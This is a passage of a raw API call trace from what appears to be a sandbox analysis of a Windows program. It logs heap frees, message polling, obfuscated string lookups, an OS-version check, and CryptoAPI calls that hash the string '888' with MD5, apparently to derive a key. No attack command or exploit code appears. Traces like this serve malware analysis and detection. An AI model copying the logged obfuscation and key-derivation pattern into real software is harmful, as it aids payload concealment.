dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0210.066] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.066] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0210.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.066] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.066] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0210.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0210.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.066] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0210.066] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0210.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0210.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0210.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0210.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0210.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.067] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.067] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0210.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0210.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0210.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.068] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.068] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.068] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0210.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0210.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.068] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.068] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0210.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0210.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0210.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.068] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0210.068] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.069] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.069] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.069] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.069] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.069] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0210.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0210.069] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.069] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.069] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0210.069] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.069] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0210.069] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0210.069] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0210.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7160, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0210.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0210.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7180, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0210.070] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c3b8) returned 1 [0210.070] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.070] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.070] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0210.070] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.070] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0210.070] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.071] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.071] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.071] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.071] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.071] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.071] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0210.071] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.071] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0210.071] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.071] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.071] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.071] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.071] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.071] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.071] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.071] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0210.071] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.071] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0210.071] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.071] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.071] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.071] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.071] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.072] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0210.072] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.072] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0210.072] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.072] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.072] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.072] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.072] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.072] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.072] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.072] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.072] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.072] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0210.072] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.072] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0210.072] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.072] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.072] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.072] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.078] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.078] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.078] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.078] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.078] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.078] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0210.078] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.078] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0210.078] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.079] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.079] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0210.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab1b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0210.079] CryptCreateHash (in: hProv=0xa7c3b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0210.079] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.080] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.080] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.080] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0210.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d28, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0210.080] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0210.080] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0210.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ce8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0210.080] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.080] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.080] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.080] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.080] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 